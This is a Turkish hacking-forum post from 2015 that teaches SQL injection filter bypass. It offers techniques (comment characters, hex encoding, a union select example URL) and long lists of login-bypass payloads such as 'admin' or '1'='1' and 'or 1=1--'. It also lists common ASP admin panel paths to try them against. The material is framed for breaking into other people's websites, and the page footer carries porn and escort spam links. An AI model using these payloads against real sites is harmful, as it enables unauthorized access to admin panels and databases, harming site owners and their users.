KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Bypass Metotları,Mantığı
Konu : Bypass Metotları,Mantığı - 17.05.2015, 11:27
Mesaj: #1

Mesela bir sitede açığı buluyoruz. Fakat bazen Bypass aşamıyoruz?
//--+++** gibi işaretlerle deniyorlar. Fakat sonuç vermiyor.
İlk olarak mantığı anlamaya çalışalım neden bypass ediyor hatayı kapatmaktansa neden bypass ? 

Biliyorsunuz ki SQL geniş bir dil, a yerine A yazsa problem çıkıyor.
Şimdi bunu böyle 2 saat arıyacağımıza hatayı bypass ederiz mantığıyla düşünüyorlar.

Tabi hatayı aramaktan daha iyidir. İnternet'te biraz araştırıyorlar yada bir şekilde sitenin sonundaki değerlere yazı yazılmasını engelliyorlar. Tabi bütün her şeyi engelliyemezler. Sistemde bir hata var her şekilde bir yerlerden o hata çıkacaktır. + o,r,d,e,r gibi db(database)'den veri çeken kodları yasaklıyorlar, ve buna forbidden diyoruz peki nasıl aşabiliriz ?
Tabiki'de +*- gibi karekterlerle;

Diyelim ki bunlar'da olmadı ne yapacaz? 
Hexleme işlemini yapacağız. Hexliyerek bypass edebilirsiniz.

Bu da olmazsa ne yapacağız?
Artık özel karekterleri deniyeceğiz.

Örnek verecek olursak;
site.php?id=23 union select 1,2,3 ve baktık forbidden yada sayfa yüklenmiyor. Gibi uyarılar geldi.


Şimdi site.php?id=--23 ((union select 1,2,3))

Bu şekilde denedik buda mı olmadı?
Çok kullanıcının aklına gelmez # koymak. Burda esas olan kodu Bypass etmek değildir, önemli olan değeri bypass etmektir. Kod yasak sistem zaten bunu okutmaya izin vermez. Fakat değeri Bypass edersek değerdeki id değeri değişmiş olacaktır bu yüzden değeride farklı okuduğu içindb(database)'deki açıklar sayfaya yansıyacaktır.

Bazen sayfaya kırık resim linki olarak vuruyor. Bunun sebebi db(database)'nin resmin url'sinde olmasıdır. Resmin sağ click'le farklı bir sekmede açtığınızda resmin sonunda istenilen kodlar olacaktır. 


Login Bypass Metodu



İmage



SQL Injection Saldırısı veya Veritabanı Saldırısı olarak'ta bilinen ve halen bir çok site için geçerli olan yönetim panelden SQL Saldırısı yani Login Bypass Yöntemi nasıl yapılır, onu anlatacağım.

Genelde Windows sunucularında çalışan Microsoft Web uygulamaları'nın (ASP, ASP.NET) veritabanlarında karşılaşılan bir saldırı çeşididir. Microsoft Access ve MsSQL Veritabanı kullanan sistemlerde bu saldırı yöntemi çokça yapılmaktadır.

PHP tabanlı MySQL Veritabanı kullanan siteler içinde geçerlidir bu saldırı. Tabi PHP yapısı son zamanlarda özellikle CMS üzerinde yapılan yoğun çalışmalar ile SQL Injection saldırıları minimuma indirilmiştir.

NOT: Ek olarak Kullanıcı'nın şifre bilgisi MD5 olarak kriptolandığı içinde bu saldırı çeşidi PHPsitelere pek yapılmamaktadır.

SQL Injection Saldırısı'nın en basit yöntemi olan Login Bypass, Kullanıcı adı ve Şifre kısmına Bypass edici **** kodlarını yazarak panele giriş yapabilmektir. 

Bu saldırıyı deneme yanılma yolu ile yapabilirsiniz aşağıdaki kodları kullanarak;

ASP Siteler için SQL Injection Login Bypass (Türevlerini artırabilirsiniz)






Kod:
- or --=-
‘or’1’=’1
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or --=-
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or --=-
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*





Eğer hiç biri işe yaramadıysa birde şunları deneyin:



Kod:
- or true--
-) or true--
-) or (--)=(-
-) or 1--
-) or ('x')=(-
- or true--
- or --=-
- or 1--
- or "x"=-
-) or true--
-) or (--)=(-
-) or 1--
-) or ("x")=(-
-)) or true--
-)) or ((--))=((-
-)) or 1--
-)) or (('x'))=((-
---
-+-
-&-
-^-
-*-
- or ----
- or --+-
- or --&-
- or --^-
- or --*-
---
-+-
-&-
-^-
-*-
- or ----
- or --+-
- or --&-
- or --^-
- or --*-
or true--
- or true--
- or true--
-) or true--
-) or true--
- or 'x'='x
-) or ('x')=('x
-)) or (('x'))=(('x
- or "x"="x
-) or ("x")=("x
-)) or (("x"))=(("x



ASP.NET(aspx) Siteler için Login Bypass kodu;

anything' OR 'x'='x

Genel'de şu tarz admin panellerinde bulunmaktadir. 
Tabi sadece bunlarda denenebilir diyemeyiz.


/giris.asp /yonetim.asp /login.asp /yonetici.asp /panel.asp

Konu Alıntıdır. Eksik olan kısımlara ekleme yapılmıştır.
Kolay Gelsin.
The-X4NG, üyesi illegalizm | Private illegal Topluluk - Hack forum,Warez Scriptler forumlarına 10.05.2015 tarihinde katılmıştır.

WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno